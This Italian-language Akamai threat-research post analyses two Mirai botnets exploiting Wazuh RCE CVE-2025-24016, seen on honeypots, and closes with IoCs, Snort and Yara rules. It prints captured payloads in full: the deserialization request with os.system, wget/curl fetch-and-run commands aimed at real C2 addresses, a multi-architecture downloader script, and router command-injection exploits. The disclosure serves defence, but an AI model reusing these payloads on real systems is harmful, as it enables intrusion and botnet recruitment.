Due botnet, una falla: Mirai si diffonde tramite la vulnerabilità del server Wazuh
Tutti i risultati riportati in questa ricerca sono stati raccolti tramite gli honeypot del SIRT e non sono stati osservati sugli effettivi endpoint di produzione dei server Wazuh su cui è installato il software Wazuh.
AVVISO SUI CONTENUTI: alcune delle convenzioni di denominazione utilizzate dai criminali che vengono menzionate in questo articolo includono insulti razzisti e linguaggio sessualmente esplicito, che sono stati censurati per scopi educativi e illustrativi, ma non riflettono in alcun modo i valori o le opinioni di Akamai.
Analisi riassuntiva
Il SIRT (Security Intelligence and Response Team) di Akamai ha identificato uno sfruttamento attivo della vulnerabilità critica per l'esecuzione di codice remoto (RCE), a cui è stato assegnato il codice CVE-2025-24016, ai danni dei server Wazuh (CVSS 9.9).
Questa vulnerabilità trae vantaggio dalla richieste delle API decentralizzate (DAPI), che consentono ad un criminale di eseguire codice da remoto caricando un dizionario di cui non è stata verificata l'integrità.
Abbiamo osservato due campagne della variante Mirai che sfruttano questa vulnerabilità. Una di queste vulnerabilità, "Resbot", ha un nome italiano nei suoi domini, che allude all'area geografica presa di mira o alla lingua parlata dal proprietario del dispositivo interessato.
Il SIRT di Akamai ha identificato questa attività nella nostra rete globale di honeypot per la prima volta a marzo 2025. Si tratta del primo episodio di sfruttamento attivo di questa vulnerabilità dalla sua divulgazione iniziale a febbraio 2025.
Le botnet che sfruttano questa vulnerabilità hanno sfruttato varie vulnerabilità note, tra cui CVE-2023-1389, CVE-2017-17215, CVE-2017-18368 e molte altre.
Alla fine di questo blog, abbiamo incluso un elenco di indicatori di compromissione (IoC) per aiutarvi a difendervi da questa minaccia.
Introduzione
Il SIRT di Akamai ha osservato alcuni tentativi di sfruttamento attivo della vulnerabilità CVE-2025-24016 alla fine di marzo 2025 nel nostro cluster di honeypot visibili su Internet. Il SIRT ha identificato due diverse botnet che sfruttano questa vulnerabilità per diffondere le varianti del malware Mirai ai sistemi presi di mira che risultano vulnerabili.
Che cos'è la vulnerabilità CVE-2025-24016?
A febbraio 2025, è stata divulgata la vulnerabilità CVE-2025-24016 nel pacchetto di gestione di Wazuh, una soluzione XDR e SIEM open source, che interessa le sue versioni dalla 4.4.0 alla 4.9.0, con una correzione pubblicata nella versione 4.9.1. La vulnerabilità consente ad un criminale di accedere ad un'API da remoto per eseguire codice arbitrario sul server preso di mira con un file JSON creato per scopi dannosi.
Nell'API di Wazuh, i parametri presenti in DistributedAPI sono serializzati come file JSON, quindi deserializzati tramite as_Wazuh_object nel file framework/wazuh/core/cluster/common.py. Questa vulnerabilità può essere sfruttata iniettando un dizionario di cui non è stata verificata l'integrità nelle richieste DAPI, che possono condurre alla valutazione di codice Python arbitrario.
A fine febbraio 2025, una PoC (Proof-of-Concept) ha descritto come eseguire la RCE con questa vulnerabilità. La RCE può essere attivata tramite l'endpoint run_as, che consente ad un criminale di controllare l'argomento auth_context. Nella PoC, l'autore dimostra questa affermazione utilizzando una richiesta Burp Suite contro l'URI /security/user/authenticate/run_as (Figura 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Figura 1. Richiesta Burp Suite (fonte: https://github.com/MuhammadWaseem29/CVE-2025-24016)
L'intestazione di autorizzazione presenta una codifica Base64 e il payload dannoso contiene l'eccezione __unhandled_exc__ di cui non è stata verificata l'integrità, che attiva l'esecuzione di codice Python arbitrario, in questo caso, exit.
Sfruttamento attivo
Il SIRT di Akamai ha scoperto alcuni tentativi di sfruttamento di questa vulnerabilità di Wazuh nella nostra rete globale di honeypot solo poche settimane dopo la sua divulgazione, all'inizio di marzo 2025. È questo l'ultimo esempio di tempistiche di sfruttamento delle vulnerabilità sempre più ridotte che gli autori delle botnet hanno adottato per le CVE recentemente pubblicate.
L'autorizzazione dell'intestazione con codifica Base64 si decodifica in wazuh-wui:MyS3cr37P450r.*- in modo identico all'autorizzazione presente nello sfruttamento della PoC (Figura 2). La struttura di endpoint e richiesta corrisponde allo sfruttamento della PoC, ma qui viene usata per diffondere il malware.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Figura 2. Il tentativo di sfruttamento n. 1 è identico alla PoC
Inoltre, abbiamo rilevato richieste strutturate in modo simile che hanno preso di mira l'endpoint /Wazuh agli inizi di maggio 2025 in modo diverso dall'endpoint standard preso di mira per questa vulnerabilità (Figura 3). Poiché le richieste sono quasi identiche alla PoC, a parte l'endpoint, è probabile che la botnet stia ancora tentando di sfruttare la stessa vulnerabilità di Wazuh.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Figura 3. Il tentativo di sfruttamento n. 2 è diverso dalla PoC
Botnet 1: diverse varianti Mirai
Dalle nostre osservazioni, emerge come questa vulnerabilità del server Wazuh sia sfruttata attivamente da due botnet separate. La prima botnet è correlata ai primi tentativi degli inizi di marzo 2025, in cui lo sfruttamento recupera ed esegue uno script di shell dannoso che funge da strumento di download per il payload principale del malware Mirai (Figura 4). Analogamente ai soliti script di shell che, spesso, vediamo con Mirai, supporta una varietà di diverse architetture per prendere di mira principalmente i dispositivi IoT (Internet of Things).
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Figura 4. Contenuto dello script di shell w.sh
Questi esempi di malware Mirai, denominati "morte", sembrano varianti Mirai LZRD, che sono in circolazione da qualche tempo e possono essere distinti facilmente dalla stringa univoca integrata nel codice sorgente che viene stampata su una console del computer preso di mira al momento dell'esecuzione: "lzrd here".
Domini associati osservati
L'indirizzo IP 176.65.134[.]62 ha offerto una risoluzione ad un dominio C2 (Command and Control) di nuklearcnc.duckdns[.]org. È importante notare che Duck DNS è un server DNS dinamico e solo questo particolare sottodominio qui è dannoso.
Questo dominio ha risolto anche in 176.65.142.252 in un certo periodo di tempo. Questo IP ha risolto in un altro dominio C2 denominato cbot.galaxias[.]cc. Tramite VirusTotal, siamo riusciti a trovare ciò che sembra essere un RAT basato su Windows che si "spaccia" per il processo svchost di Windows ed esegue il beacon del sottodominio cbot.galaxias[.]cc per C2.
Ad un altro sottodominio, neon.galaxias[.]cc, è stato associato ciò che sembrava essere una distribuzione e una comunicazione più standard della variante Mirai. Uno dei suoi indirizzi IP di risoluzione, 209.141.34[.]106, ha anche risolto in altri due domini C2: pangacnc[.]com e jimmyudp-raw[.]xyz.
Il dominio jimmyudp-raw[.]xyz ha avuto tre diversi esempi di malware denominati Mirai su VirusTotal. Il primo, denominato "neon", è una variante Mirai non identificata che è connessa all'indirizzo 65.222.202[.]53 tramite la porta 80 per le comunicazioni C2 e conteneva la stringa della console "fuck u nigga" integrata nel codice sorgente.
La seconda, denominata "k03ldc" sembra essere una versione modificata o aggiornata della variante Mirai V3G4. Contenendo la stringa della console "666V3G4-Katana999" integrata nel codice sorgente, è correlata all'indirizzo 196.251.86[.]49 tramite la porta 36063 per le comunicazioni C2.
Infine, il terzo esempio, denominato "KKveTTgaAAsecNNaaaa", è la variante Mirai V3G4 originale. Il malware si connette all'indirizzo 209.141.34[.]106 tramite la porta 60195 per le comunicazioni C2 e utilizza la stringa "xXxSlicexXxxVEGA" integrata nel codice sorgente al momento dell'infezione, riconoscendo che, se un computer preso di mira è già infettato dalla variante V3G4, verrà stampato "We got this shit already" anziché il messaggio consueto.
Il dominio pangacnc[.]com ha avuto due diversi esempi di malware denominati Mirai su VirusTotal: uno denominato "KKveTTgaAAsecNNaaaa, che è identico al malware citato in precedenza, l'altro denominato "vision", una variante Mirai LZRD che si connette all'indirizzo 65.222.202[.]53 tramite la porta 80, proprio come l'esempio "neon" proveniente dall'altro dominio C2. Ciò potrebbe far supporre che il malware Mirai denominato "neon" sia una versione modificata della variante LZRD.
Altre vulnerabilità sfruttate
Oltre a prendere di mira la RCE di Wazuh, abbiamo osservato questa botnet durante il suo tentativo di sfruttare una serie altre vulnerabilità note, tra cui alcune vulnerabilità che abbiamo osservato venire sfruttate (Figura 5, Figura 6 e Figura 7) e che sono state documentate nei post del blog precedenti.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Figura 5. Vulnerabilità Hadoop YARN
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Figura 6. CMDi (Command injection) TP-Link Archer AX21 (vedere https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Figura 7. Sfruttamento della RCE del router ZTE ZXV10 H108L (vedere https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: Botnet Resbot/Resentual
Abbiamo identificato la seconda botnet nei tentativi di sfruttamento sull'endpoint /Wazuh agli inizi di maggio 2025. Questa botnet, analogamente al primo sfruttamento, recupera ed esegue uno script di shell dannoso che funge da strumento di download di Mirai. Il malware, denominato "resgod", viene identificato tramite la stringa della console "Resentual got you!" integrata nel codice sorgente. Anche in questo caso, analogamente alla prima botnet, il payload viene sferrato contro un'ampia gamma di architetture che prendono di mira i dispositivi IoT.
Un aspetto interessante che abbiamo notato relativamente a questa botnet è stato il linguaggio ad essa associato. Il malware è stato diffuso tramite una serie di domini contenenti tutti nomi italiani, come, ad esempio, domini del tipo "gestisciweb.com",
che sembrano simili a nomi di domini dannosi, spesso utilizzati per gli attacchi di phishing perché appaiono molto più legittimi rispetto ai relativi C2 "resbot.online" (che è più chiaramente un dominio dannoso). Le convenzioni di denominazione linguistiche potrebbero indicare una campagna progettata per prendere di mira dispositivi che sono di proprietà e vengono gestiti da utenti di lingua italiana in particolare.
Le stringhe dell'esempio sembra non crittografate e mostrano una serie di altri exploit e funzionalità di scansione. L'indirizzo IP 104.168.101[.]27 è integrato nel codice sorgente del malware e viene utilizzato come server C2 tramite la porta TCP 62627 (una delle possibili porte C2). Inoltre, abbiamo osservato questa botnet mentre tentava di diffondersi su FTP tramite la porta 21 e di condurre una scansione telnet.
I diversi exploit integrati nel codice sorgente sono mostrati in Figura 8, Figura 9, Figura 10 e Figura 11.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Figura 8. RCE del router Huawei HG532 (vedere https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Figura 9. RCE Realtek SDK Miniigd UPnP SOAP (vedere https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Figura 10. CMDi (Command injection) del router TrueOnline ZyXEL P660HN-T v1 (vedere https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Figura 11. Diffusione tramite FTP
Conclusione
La propagazione della botnet Mirai non accenna a diminuire, quindi è alquanto chiara la necessità di riprogettare e riutilizzare il vecchio codice sorgente per configurare o creare nuove botnet. Inoltre, gli autori delle botnet, spesso, riescono ad ottenere i loro scopi semplicemente sfruttando exploit pubblicati di recente.
Anche se il programma delle CVE va a tutto vantaggio del settore, talvolta, può risultare un'arma a doppio taglio perché fa luce sulle vulnerabilità che potrebbero essere state, altrimenti, sottovalutate dai criminali.
I tentativi dei ricercatori di far comprendere alle organizzazioni l'importanza delle vulnerabilità mediante la creazione di PoC continuano a portare a pessimi risultati a indicare quanto sia difficile tenere il passo con gli aggiornamenti man mano che vengono rilasciati. Gli operatori delle botnet riescono a tenere sotto controllo la divulgazione di alcune di queste vulnerabilità e, specialmente nei casi in cui le PoC sono rese disponibili, si adattano rapidamente al codice delle PoC per far proliferare le loro botnet.
A differenza di alcune delle altre vulnerabilità da noi segnalate di recente che interessano solo i dispositivi ritirati, la CVE-2025-24016 interessa i server Wazuh attivi su cui vengono eseguite versioni obsolete. Si consiglia vivamente di correggere questa vulnerabilità con l'ultima versione, in questo caso, Wazuh versione 4.9.1 o successiva. Wazuh ha pubblicato alcune linee guida su come proteggere i sistemi in modo corretto, che, se vengono seguite, consentono di non riscontrare problemi con questa campagna.
Tenetevi aggiornati con noi
Il SIRT di Akamai continuerà a monitorare e a segnalare minacce come queste per i clienti dell'azienda e per la più vasta comunità della sicurezza. Per tenervi aggiornati sulle ultime novità del SIRT e su altre pubblicazioni dell'Akamai Security Intelligence Group, potete consultare la nostra pagina relativa ai lavori di ricerca e seguirci sui social media.
IOC
Abbiamo incluso un elenco di indicatori di compromissione (IoC), nonché di regole Snort e Yara, per aiutare i team addetti alla sicurezza.
Regole Snort per gli IoC di rete
Regole Snort per gli IP C2 (botnet n. 1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Regole Snort per il rilevamento della risoluzione dei domini C2 (botnet n. 1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Regole Snort per gli IP C2 (botnet n. 2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Regole Snort per il rilevamento della risoluzione dei domini C2 (botnet n. 2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Regole Yara per gli esempi di malware (botnet n. 1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Regole Yara per gli esempi di malware (botnet n. 2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Indirizzi IPv4 dannosi (botnet n. 1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Domini dannosi (botnet n. 1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Indirizzi IPv4 dannosi (botnet n. 2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Domini dannosi (botnet n. 2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
Hash SHA256 (botnet n. 1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
Hash SHA256 (botnet n. 2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
